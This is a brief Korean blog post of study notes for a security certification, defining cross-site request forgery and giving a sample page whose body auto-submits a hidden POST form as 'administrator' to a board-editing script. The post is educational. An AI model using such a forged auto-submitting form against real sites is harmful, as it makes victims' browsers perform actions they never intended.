한땀한땀 정성들인 코딩
CSRF 공겨기법 본문
반응형
cross-site request forgery
-사이트간 요청 위조
-사용자가 자신의 의지와는 무관하게 웹서버를 공격한다.
<body onload="document.form_test.submit();">
<form>
<form name="form_test" action="board_update_reg.asp" method="POST">
<input type="hidden" name="user" value="관리자">
<input type="hidden" name="idx" value="2">
</form>
idx는 글번호
board_update_reg.asp는 글 수정 소스코드
반응형
'자격증 > 정보보안기사' 카테고리의 다른 글
| sql injection (0) | 2017.02.13 |
|---|---|
| network port (0) | 2017.02.13 |
| web어플 공격기법 (0) | 2017.02.12 |
| XSS (0) | 2017.02.12 |
| 웹 서비스 (0) | 2017.02.12 |